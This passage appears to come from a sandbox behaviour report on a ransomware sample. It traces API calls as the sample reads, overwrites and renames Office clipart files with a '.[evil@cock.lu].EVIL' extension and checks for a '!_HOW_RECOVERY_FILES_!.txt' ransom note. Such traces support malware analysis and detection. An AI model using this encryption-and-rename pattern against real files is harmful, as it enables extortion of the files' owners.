(lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf.[evil@cock.lu].evil")) returned 1 [0119.509] ??_V@YAXPEAX@Z () returned 0x1 [0119.513] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF", dwFileAttributes=0x200) returned 0 [0119.513] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.513] wcsstr (_Str="DD01182_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.513] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 69 [0119.513] wcscmp (_String1="DD01182_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.513] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01182_.WMF") returned 0x0 [0119.513] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 0x45 [0119.514] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.517] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbb4, lpOverlapped=0x0) returned 1 [0119.531] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.531] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.531] _errno () returned 0x84b1160840 [0119.531] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.531] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbc0, lpOverlapped=0x0) returned 1 [0119.531] CloseHandle (hObject=0x1a8) returned 1 [0119.531] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.532] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.532] __uncaught_exception () returned 0x84b1160800 [0119.532] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.532] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf.[evil@cock.lu].evil")) returned 1 [0119.533] ??_V@YAXPEAX@Z () returned 0x1 [0119.536] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF", dwFileAttributes=0x200) returned 0 [0119.536] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.536] wcsstr (_Str="DD01183_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.536] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 69 [0119.536] wcscmp (_String1="DD01183_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.536] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01183_.WMF") returned 0x0 [0119.536] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 0x45 [0119.536] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.538] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8f8, lpOverlapped=0x0) returned 1 [0119.544] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.544] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.544] _errno () returned 0x84b1160840 [0119.545] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.545] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x900, lpOverlapped=0x0) returned 1 [0119.545] CloseHandle (hObject=0x1a8) returned 1 [0119.545] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.545] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.545] __uncaught_exception () returned 0x84b1160800 [0119.545] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.545] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf.[evil@cock.lu].evil")) returned 1 [0119.546] ??_V@YAXPEAX@Z () returned 0x1 [0119.550] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF", dwFileAttributes=0x200) returned 0 [0119.550] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.550] wcsstr (_Str="DD01186_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.550] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 69 [0119.550] wcscmp (_String1="DD01186_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.550] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01186_.WMF") returned 0x0 [0119.550] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 0x45 [0119.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.552] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2174, lpOverlapped=0x0) returned 1 [0119.560] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.560] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.560] _errno () returned 0x84b1160840 [0119.560] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.560] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2180, lpOverlapped=0x0) returned 1 [0119.560] CloseHandle (hObject=0x1a8) returned 1 [0119.560] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.561] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.561] __uncaught_exception () returned 0x84b1160800 [0119.561] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.561] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf.[evil@cock.lu].evil")) returned 1 [0119.562] ??_V@YAXPEAX@Z () returned 0x1 [0119.565] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF", dwFileAttributes=0x200) returned 0 [0119.565] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.565] wcsstr (_Str="DD01366_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.565] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 69 [0119.565] wcscmp (_String1="DD01366_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.565] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01366_.WMF") returned 0x0 [0119.565] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 0x45 [0119.565] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.567] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6e8, lpOverlapped=0x0) returned 1 [0119.570] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.570] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.570] _errno () returned 0x84b1160840 [0119.570] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.570] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x700, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x700, lpOverlapped=0x0) returned 1 [0119.570] CloseHandle (hObject=0x1a8) returned 1 [0119.570] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.571] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.571] __uncaught_exception () returned 0x84b1160800 [0119.571] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.571] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf.[evil@cock.lu].evil")) returned 1 [0119.572] ??_V@YAXPEAX@Z () returned 0x1 [0119.574] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF", dwFileAttributes=0x200) returned 0 [0119.575] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.575] wcsstr (_Str="DD01434_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.575] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 69 [0119.575] wcscmp (_String1="DD01434_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.575] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01434_.WMF") returned 0x0 [0119.575] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 0x45 [0119.575] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.576] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x384, lpOverlapped=0x0) returned 1 [0119.579] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.579] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.579] _errno () returned 0x84b1160840 [0119.579] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.579] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3a0, lpOverlapped=0x0) returned 1 [0119.579] CloseHandle (hObject=0x1a8) returned 1 [0119.579] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.579] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.579] __uncaught_exception () returned 0x84b1160800 [0119.579] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.580] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf.[evil@cock.lu].evil")) returned 1 [0119.580] ??_V@YAXPEAX@Z () returned 0x1 [0119.583] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF", dwFileAttributes=0x200) returned 0 [0119.583] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.583] wcsstr (_Str="DD01585_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.583] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 69 [0119.583] wcscmp (_String1="DD01585_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.583] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01585_.WMF") returned 0x0 [0119.583] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 0x45 [0119.583] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.585] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9dc, lpOverlapped=0x0) returned 1 [0119.618] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.618] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.618] _errno () returned 0x84b1160840 [0119.618] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.618] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9e0, lpOverlapped=0x0) returned 1 [0119.619] CloseHandle (hObject=0x1a8) returned 1 [0119.619] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.619] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.619] __uncaught_exception () returned 0x84b1160800 [0119.619] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.619] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf.[evil@cock.lu].evil")) returned 1 [0119.621] ??_V@YAXPEAX@Z () returned 0x1 [0119.623] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF", dwFileAttributes=0x200) returned 0 [0119.623] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.623] wcsstr (_Str="DD01586_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.623] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 69 [0119.623] wcscmp (_String1="DD01586_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.623] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01586_.WMF") returned 0x0 [0119.624] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 0x45 [0119.624] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.628] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x914, lpOverlapped=0x0) returned 1 [0119.643] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.643] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.643] _errno () returned 0x84b1160840 [0119.643] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.643] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x920, lpOverlapped=0x0) returned 1 [0119.652] CloseHandle (hObject=0x1a8) returned 1 [0119.652] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.653] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.653] __uncaught_exception () returned 0x84b1160800 [0119.653] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.653] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf.[evil@cock.lu].evil")) returned 1 [0119.654] ??_V@YAXPEAX@Z () returned 0x1 [0119.658] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF", dwFileAttributes=0x200) returned 0 [0119.659] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.659] wcsstr (_Str="DD01628_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.659] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 69 [0119.659] wcscmp (_String1="DD01628_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.659] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01628_.WMF") returned 0x0 [0119.659] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 0x45 [0119.659] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.661] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4a7c, lpOverlapped=0x0) returned 1 [0119.691] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.691] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.691] _errno () returned 0x84b1160840 [0119.691] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.691] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x4a80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4a80, lpOverlapped=0x0) returned 1 [0119.691] CloseHandle (hObject=0x1a8) returned 1 [0119.691] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.691] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.691] __uncaught_exception () returned 0x84b1160800 [0119.691] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.692] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf.[evil@cock.lu].evil")) returned 1 [0119.694] 